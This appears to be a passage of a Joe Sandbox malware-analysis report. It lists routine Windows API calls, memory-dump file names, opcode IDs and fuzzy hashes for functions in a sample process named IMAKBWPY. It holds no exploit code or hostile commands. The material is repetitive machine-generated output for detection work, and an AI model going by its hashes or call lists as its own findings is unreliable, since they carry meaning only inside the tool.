                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 1357844191-0
                                                                                                                • Opcode ID: ed2511d4e69c1abe9110b95b40aea9624a894a002a70ad11134b66bb5f12e2c1
                                                                                                                • Instruction ID: aeac66674c6d57991762b8a7cb25d20adb4930552fe17987725235093896f654
                                                                                                                • Opcode Fuzzy Hash: ed2511d4e69c1abe9110b95b40aea9624a894a002a70ad11134b66bb5f12e2c1
                                                                                                                • Instruction Fuzzy Hash: BBD0C93215420DAB8F015FE8EC0DEAA3BACEB586027448415B919C2120CB39E4609A60
                                                                                                                APIs
                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,00232274,?,00000001,75C0B390,8000FFFF,?,?,00270267,?,?,00000000,00000000,8000FFFF), ref: 00233960
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,00232274,?,00000001,75C0B390,8000FFFF,?,?,00270267,?,?,00000000,00000000,8000FFFF), ref: 00233967
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 1357844191-0
                                                                                                                • Opcode ID: 39c28364ee83e02bece6c314910af51b0475100b5d69aa2ba213a02eefea6dd4
                                                                                                                • Instruction ID: 05766015fa0486bc7dfbf2630b5f9a81907513463419770f3eb8495cb2f62917
                                                                                                                • Opcode Fuzzy Hash: 39c28364ee83e02bece6c314910af51b0475100b5d69aa2ba213a02eefea6dd4
                                                                                                                • Instruction Fuzzy Hash: B7C012321A420CAB8B016FF8EC0ED9A3BACBB286027448400B90DC2120DB38E0908B60
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 002735F8
                                                                                                                  • Part of subcall function 0027304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00273609,00000000,?,00000000), ref: 00273069
                                                                                                                  • Part of subcall function 0027304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0025C025,?,00235405,?,00000000,?), ref: 00273075
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorHandleInitLastModuleVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 52713655-0
                                                                                                                • Opcode ID: ef04136cd6489760c7aab7649973eae00996212e211b610d765a41a5b548c5b3
                                                                                                                • Instruction ID: f2de5a2ab6c8d046d49b9de40c68e6517f639086a2fd3963ec5b60bba9ed552e
                                                                                                                • Opcode Fuzzy Hash: ef04136cd6489760c7aab7649973eae00996212e211b610d765a41a5b548c5b3
                                                                                                                • Instruction Fuzzy Hash: E6315076D10229AFDB11DFA8C884ADEB7F8EF08710F01856AED05BB311D6359D108BA4
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 1003AD34
                                                                                                                  • Part of subcall function 1003D4C2: InitializeCriticalSection.KERNEL32(00000000,?,00000010,?,1003ACE6,00000009), ref: 1003D4FF
                                                                                                                  • Part of subcall function 1003D4C2: EnterCriticalSection.KERNEL32(00000010,00000010,?,1003ACE6,00000009), ref: 1003D51A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2198452182.0000000010001000.00000020.00000001.01000000.00000012.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2198387888.0000000010000000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198565458.000000001004A000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198692448.0000000010067000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198869837.000000001006B000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198954748.000000001006D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199183766.0000000010074000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199273379.0000000010076000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_10000000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$AllocateEnterHeapInitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 1616793339-0
                                                                                                                • Opcode ID: 5cf221eabea632289d6e133d3815a50a268c7bba50151b71f96da381b0319956
                                                                                                                • Instruction ID: fb667e068bbf76fc7263683791686bc64be05de829e3cef74f706eb2aae4af69
                                                                                                                • Opcode Fuzzy Hash: 5cf221eabea632289d6e133d3815a50a268c7bba50151b71f96da381b0319956
                                                                                                                • Instruction Fuzzy Hash: 4D21C431E00255AFDB12DB68DC42BCD77B4EB02766F218616F421EF5D1C7B4A9C08AA4
                                                                                                                APIs
                                                                                                                • RegCloseKey.ADVAPI32(80070490), ref: 002758CA
                                                                                                                  • Part of subcall function 002710B5: RegQueryValueExW.ADVAPI32 ref: 0027112B
                                                                                                                  • Part of subcall function 002710B5: RegQueryValueExW.ADVAPI32 ref: 00271163
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 1979452859-0
                                                                                                                • Opcode ID: d483cc1f58005b53bfc36feee8502629f4e59557c4604a5653a31cb37f2cbdd1
                                                                                                                • Instruction ID: bed2a598310b2da65c3f5f74402b23483ef281cc267151f98cb5f26af550b344
                                                                                                                • Opcode Fuzzy Hash: d483cc1f58005b53bfc36feee8502629f4e59557c4604a5653a31cb37f2cbdd1
                                                                                                                • Instruction Fuzzy Hash: 9811C63682163AEF8B216E94CD415AEF768EF04320B11C179FD4967211C7B14EB0DBD2
                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00248BD3,0000001C,80070490,00000000,00000000,80070490), ref: 002334D5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: 0109b2af90c1a03f88a991767b90667f5c5e2dee9397c11496d0778d9ae2cd76
                                                                                                                • Instruction ID: b5d42e3bb0ae7ef35a883680e6db3de270fb822167b5fd4fbc7ecade00654462
                                                                                                                • Opcode Fuzzy Hash: 0109b2af90c1a03f88a991767b90667f5c5e2dee9397c11496d0778d9ae2cd76
                                                                                                                • Instruction Fuzzy Hash: 3FE012B22111247BE6026F615C05DAB7B9CAF05754F008051BF44D6010E762D66086B0
                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0026F491
                                                                                                                  • Part of subcall function 0027998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00279A09
                                                                                                                  • Part of subcall function 0027998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00279A1A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: 3472e54aa8587bf4a9a5f21d0b8ff0a35d9c849191e23e1dd47377a0f87ed41b
                                                                                                                • Instruction ID: 44a7fdd20a38ff55808bc8ad7c4892ab9019fd354e8de9ddb38374a7788ca962
                                                                                                                • Opcode Fuzzy Hash: 3472e54aa8587bf4a9a5f21d0b8ff0a35d9c849191e23e1dd47377a0f87ed41b
                                                                                                                • Instruction Fuzzy Hash: 04B012A5279741BC3E4413102D03C37010CC1C3F21330C26FB904C0040AC804CB00072
                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0026F491
                                                                                                                  • Part of subcall function 0027998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00279A09
                                                                                                                  • Part of subcall function 0027998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00279A1A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: 67b40a73a8693ed24d4971d6ab778a87f6d539603c31db3a5107e70a4a2029af
                                                                                                                • Instruction ID: 6e6116637783983f074b5ccd2e2476481345dcef43e8ba05e4a8d79738af60e1
                                                                                                                • Opcode Fuzzy Hash: 67b40a73a8693ed24d4971d6ab778a87f6d539603c31db3a5107e70a4a2029af
                                                                                                                • Instruction Fuzzy Hash: 08B012A1279741AC3E8453142D03C37014CC1C7F61330C26FF508C1040EC904CF00032
                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0026F491
                                                                                                                  • Part of subcall function 0027998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00279A09
                                                                                                                  • Part of subcall function 0027998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00279A1A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: 34627c3e3cc1aa0947c711423810c6a392ef16aad7dc9bd65bf21d98411caf2a
                                                                                                                • Instruction ID: a57f2393ee62746c8518182aa6336c2cb08fde424352d895f5b646b97e3cb089
                                                                                                                • Opcode Fuzzy Hash: 34627c3e3cc1aa0947c711423810c6a392ef16aad7dc9bd65bf21d98411caf2a
                                                                                                                • Instruction Fuzzy Hash: B4B012A1279741AD3E8453142E03D37014CC1C7F21330816FB508C1040EC814CB10032
                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0027966B
                                                                                                                  • Part of subcall function 0027998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00279A09
                                                                                                                  • Part of subcall function 0027998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00279A1A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: 66dc62469d6bd4c7eaeb3417f390641228f6c89df9aa6150e947d12cf39fb0dd
                                                                                                                • Instruction ID: 0ec9980b0914e40060535b5303c6a683df75533a846a684a6f1c0eed6a00b2e2
                                                                                                                • Opcode Fuzzy Hash: 66dc62469d6bd4c7eaeb3417f390641228f6c89df9aa6150e947d12cf39fb0dd
                                                                                                                • Instruction Fuzzy Hash: 45B01291278302AC3F4453041C03C37010CC5C2B11330C21FFC08C1040F8900CB40132
                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0027966B
                                                                                                                  • Part of subcall function 0027998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00279A09
                                                                                                                  • Part of subcall function 0027998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00279A1A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: f61056ed77979872f5ddb602c49ea2799c7b08ba856314dc387d4ae38a166018
                                                                                                                • Instruction ID: 5e9630c7ee61bbf9b1525d9cd6715ddf02bc38ec87f100a16e82d5b1b1550681
                                                                                                                • Opcode Fuzzy Hash: f61056ed77979872f5ddb602c49ea2799c7b08ba856314dc387d4ae38a166018
                                                                                                                • Instruction Fuzzy Hash: C2B01291278341BC3F0413046C83C37010CD9C2B11330C21FF404E0040B8900CB00233
                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0027966B
                                                                                                                  • Part of subcall function 0027998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00279A09
                                                                                                                  • Part of subcall function 0027998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00279A1A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269201914-0
                                                                                                                • Opcode ID: 515525cb525a6a35df13ab72444d41407fa9998a3a977027fe39d584d21e316d
                                                                                                                • Instruction ID: b70836c60601bc1b390de1786390c7e4c9f434de351c9ce7d08740926145f874
                                                                                                                • Opcode Fuzzy Hash: 515525cb525a6a35df13ab72444d41407fa9998a3a977027fe39d584d21e316d
                                                                                                                • Instruction Fuzzy Hash: 7CB01291278341AC3F4453482E43D37010CC9C2B11330C21FF408D1040F8900CB10132
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00233BD3: GetProcessHeap.KERNEL32(00000000,?,?,002321CC,?,75C0B390,8000FFFF,?,?,00270267,?,?,00000000,00000000,8000FFFF), ref: 00233BDB
                                                                                                                  • Part of subcall function 00233BD3: HeapSize.KERNEL32(00000000,?,002321CC,?,75C0B390,8000FFFF,?,?,00270267,?,?,00000000,00000000,8000FFFF), ref: 00233BE2
                                                                                                                • lstrlenW.KERNEL32(?,?,75C0B390,00000000,?), ref: 0023139C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$ProcessSizelstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3492610842-0
                                                                                                                • Opcode ID: 0d07c5d33f8ff3d218e052fc1ac558f4833d799feca18633d04e9f118c391d60
                                                                                                                • Instruction ID: b9c4a29c20b280ce254122c5cebdccfa04e460b0510b137c7780f973bcda974c
                                                                                                                • Opcode Fuzzy Hash: 0d07c5d33f8ff3d218e052fc1ac558f4833d799feca18633d04e9f118c391d60
                                                                                                                • Instruction Fuzzy Hash: FC2105B2D20219AFCB128F68DC407ADB7B5EF84360F1581A5EE40AB250C731DE719B80
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,1003D3FE,?,Microsoft Visual C++ Runtime Library,00012010,?,10065314,?,10065364,?,?,?,Runtime Error!Program: ), ref: 10042412
                                                                                                                • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 1004242A
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 1004243B
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 10042448
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2198452182.0000000010001000.00000020.00000001.01000000.00000012.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2198387888.0000000010000000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198565458.000000001004A000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198692448.0000000010067000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198869837.000000001006B000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198954748.000000001006D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199183766.0000000010074000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199273379.0000000010076000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_10000000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                                                • API String ID: 2238633743-4044615076
                                                                                                                • Opcode ID: 799cf314ad492308496247c9b563abddd7106df989d6cf767f01176e029c0a67
                                                                                                                • Instruction ID: 17f04b8dbc2f0f39db912973e45c10f83cb6d578a3b0ffcb47dab7180785a235
                                                                                                                • Opcode Fuzzy Hash: 799cf314ad492308496247c9b563abddd7106df989d6cf767f01176e029c0a67
                                                                                                                • Instruction Fuzzy Hash: 19012C31700232AFE740EFB68CC496F3AEAEB896C1791043DE641D2221DB75CA40DB65
                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000010), ref: 1003D347
                                                                                                                • GetStdHandle.KERNEL32(000000F4,10065314,00000000,?,00000000,00000010), ref: 1003D41D
                                                                                                                • WriteFile.KERNEL32(00000000), ref: 1003D424
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2198452182.0000000010001000.00000020.00000001.01000000.00000012.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2198387888.0000000010000000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198565458.000000001004A000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198692448.0000000010067000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198869837.000000001006B000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198954748.000000001006D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199183766.0000000010074000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199273379.0000000010076000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_10000000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$HandleModuleNameWrite
                                                                                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                • API String ID: 3784150691-4022980321
                                                                                                                • Opcode ID: c60a6862b05b0eeaa0b0c6da0798255d8409c808b049069cc203533e4e454b6b
                                                                                                                • Instruction ID: ea284725aa69b7f2d54b15a4bf4d6ec212d82204cd68a3504978acad56079f13
                                                                                                                • Opcode Fuzzy Hash: c60a6862b05b0eeaa0b0c6da0798255d8409c808b049069cc203533e4e454b6b
                                                                                                                • Instruction Fuzzy Hash: 8B31E7B2A00218AFDB11EB70DD85FEA73BDEF46381F600567F544EA041EB70EA858B55
                                                                                                                APIs
                                                                                                                • MulDiv.KERNEL32(00000001,?,00000001,00000000,?,?,00000000), ref: 10003308
                                                                                                                • MulDiv.KERNEL32(00000001,?,00000001,00000000,?,?,00000000), ref: 1000331B
                                                                                                                • SetRect.USER32 ref: 10003345
                                                                                                                • SetRect.USER32 ref: 1000335A
                                                                                                                • OffsetRect.USER32(?,?,00000001), ref: 10003377
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2198452182.0000000010001000.00000020.00000001.01000000.00000012.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2198387888.0000000010000000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198565458.000000001004A000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198692448.0000000010067000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198869837.000000001006B000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198954748.000000001006D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199183766.0000000010074000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199273379.0000000010076000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_10000000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Offset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3858320380-0
                                                                                                                • Opcode ID: 3226da8c7aae29fff850b79aec30523d84db9e9e9f48e35ff210dfdc33153f11
                                                                                                                • Instruction ID: 70dd025181f41ac09f695ed5ce9d0c94a2e41b55f9dc218f0c3b194561ad07a1
                                                                                                                • Opcode Fuzzy Hash: 3226da8c7aae29fff850b79aec30523d84db9e9e9f48e35ff210dfdc33153f11
                                                                                                                • Instruction Fuzzy Hash: 03216DB5605315AFE200DF188EC5A5FBBEDEB8A640F04492EF541D7261C770ED088BB2
                                                                                                                APIs
                                                                                                                • VirtualFree.KERNEL32(?,00100000,00004000,?,?,?,?,1003A99B,1003A9EF,?,?,?), ref: 1003D231
                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,1003A99B,1003A9EF,?,?,?), ref: 1003D23C
                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,1003A99B,1003A9EF,?,?,?), ref: 1003D249
                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,1003A99B,1003A9EF,?,?,?), ref: 1003D265
                                                                                                                • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000,?,?,1003A99B,1003A9EF,?,?,?), ref: 1003D286
                                                                                                                • HeapDestroy.KERNEL32(?,?,1003A99B,1003A9EF,?,?,?), ref: 1003D298
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2198452182.0000000010001000.00000020.00000001.01000000.00000012.sdmp, Offset: 10000000, based on PE: true
